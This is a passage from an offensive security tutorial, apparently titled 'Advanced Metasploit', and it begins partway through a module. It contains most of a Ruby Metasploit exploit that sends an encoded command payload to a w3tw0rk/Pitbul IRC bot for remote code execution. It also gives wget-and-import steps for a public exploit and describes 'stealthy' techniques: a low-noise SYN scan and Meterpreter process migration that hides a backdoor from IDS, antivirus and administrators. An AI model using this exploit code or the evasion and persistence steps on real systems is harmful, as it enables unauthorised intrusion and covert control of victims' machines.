'Space' => 300, # According to RFC 2812, the max length message is 512,
including the cr-lf
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Targets' =>
[
[ 'w3tw0rk', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 04 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
], self.class)
end
def check
connect
res = register(sock)
if res =~ /463/ || res =~ /464/
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
res = join(sock)
if !res =~ /353/ && !res =~ /366/
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']}
channel")
Advanced Metasploit 45
return Exploit::CheckCode::Unknown
end
quit(sock)
disconnect
if res =~ /auth/ && res =~ /logged in/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def send_msg(sock, data)
sock.put(data)
data = ""
begin
read_data = sock.get_once(-1, 1)
while !read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
data
end
def register(sock)
msg = ""
if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
end
if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error("The nick is longer than 9 characters, using #{nick}")
else
nick = datastore['NICK']
end
msg << "NICK #{nick}\r\n"
Advanced Metasploit 46
msg << "USER #{nick} #{Rex::Socket.source_address(rhost)}
#{rhost} :#{nick}\r\n"
send_msg(sock,msg)
end
def join(sock)
join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
send_msg(sock, join_msg)
end
def w3tw0rk_command(sock)
encoded = payload.encoded
command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"
send_msg(sock, command_msg)
end
def quit(sock)
quit_msg = "QUIT :bye bye\r\n"
sock.put(quit_msg)
end
def exploit
connect
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
res = register(sock)
if res =~ /463/ || res =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return
end
print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} chan-
nel...")
res = join(sock)
if !res =~ /353/ && !res =~ /366/
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']}
channel")
return
end
print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")
w3tw0rk_command(sock)
quit(sock)
disconnect
end
Advanced Metasploit 47
end
_________________________________________________snip_______________________________________________
The script above is a structure for writing an exploit for Metasploit. You can add or rewrite the exploit if you want. The
source can be downloaded here: https://www.exploit-db.com/exploits/38302/.
After downloading the source, copy it into the directory with the Metasploit command:
root@sungai : ~# wget https://www.exploit-db.com/exploits/38302/; mv 38302
cupenkz.rb; mv cupenkz.rb ~/.msf4/modules/exploits/
Note:
- wget is the command for downloading the exploit file
- mv is the command for renaming and moving the file
FIGURE 79: DOWNLOAD EXPLOIT AND IMPORT TO METASPLOIT DIRECTORY
After downloading the exploit to be imported, run the command reload_all to reload all settings that have been changed
before.
FIGURE 80: RELOAD ALL NEW MODULE ON METASPLOIT
After reloading all new modules on Metasploit, you can search for module with the command:
msf> search cupenkz
FIGURE 81: SEARCHING CUPENKZ EXPLOIT
There is one exploit named cupenkz, with the description “exploit Pitbul IRC Bot Remote Code Execution.” Now use the
exploit with the command:
msf> use exploit/cupenkz
FIGURE 82: USE EXPLOIT CUPENKZ
It can be seen, after you import the module itself, that indirectly you've made a custom module to be added to Metasploit.
Advanced Metasploit 48
6. Stealthy techniques when using Metasploit. Stealthy techniques are methods by which the attacker installs a backdoor so that targets that have been acquired can be
entered at any time; the attacker can then perform scanning and other techniques in many circumstances where it seems
unimaginable. In this example, the target has IDS/IPS, which is very paranoid, so that when it is done, the IDS/IPS instantly
displays a warning and alerts the attacker. The target also has AV/antirootkit so, when installing a backdoor, it will be
known by admin.
This time I pointed out that the attacker is scanning the target and is not suspicious. However, not all administrators can
bypass, because setting a system depends on whether or not it is paranoid about that setting.
First of all, I run Metasploit with the command:
root@sungai:~# msfconsole
FIGURE 83: START METASPLOIT
Then use the module auxiliary/scanner/Portscan/syn:
msf> use auxiliary/scanner/portscan/syn
Advanced Metasploit 49
FIGURE 84: USING AUXILIARY/SCANNER/PORTSCAN/SYN
The module option can be seen above; it appears that the attacker can adjust the settings for how many ports will be
scanned and how much timeout is used. It is as if you are knocking on a door: If you knock on the door as much as 100
times, it will be more audible than if you knock on the door 2 times. Likewise, in scanning techniques, if you send multiple
packets as much as 100 times, it will look more suspicious than if you transmit a packet 2 times. Here I set up to do the
scanning of ports 20-30 only, and setting timeout to 200. Use the command
msf auxiliary (syn)> set ports 20-30
msf auxiliary (syn)> set timeout 200
FIGURE 85: SETTING PORT AND TIMEOUT
After setting port and timeout, you must set the IP target, with the command:
msf auxiliary (syn)> set rhosts 192.168.109.1
FIGURE 86: SETTING IP TARGET
Then you can run with the command:
msf auxiliary (syn)> run
FIGURE 87: RUNNING SYN SCAN7
From the picture above, we see that the target has port 22 open. The result of port scanning is short because I did not use
random port scanning and tried to do stealthy scanning
Advanced Metasploit 50
My second example is where, after getting access to a computer target, I put a stealth backdoor into the victim's computer.
The backdoor is installed here using the migrate feature contained in Meterpreter. The feature creates a fictitious process
on the target computer.
Here I use the PS command in Meterpreter when a target has been hacked:
FIGURE 88: PROCESS ON COMPUTER TARGET
The picture above shows all processes on the target computer; after I see all these processes, I use the command:
Meterpreter > run post/windows/manage/migrate
FIGURE 89: MAKE FICTITIOUS PROCESS ON THE TARGET COMPUTER
The picture above shows that the command creates a fictitious process for Meterpreter so the svchost.exe process is ma-
nipulated to run Meterpreter on the target computer. The results are shown below:
Advanced Metasploit 51
FIGURE 90: FICTITIOUS PROCESS RUNNING
Results from the victim's computer that is running a fictitious process show the process PID 1240 running notepad.exe,
where the application is fictitious.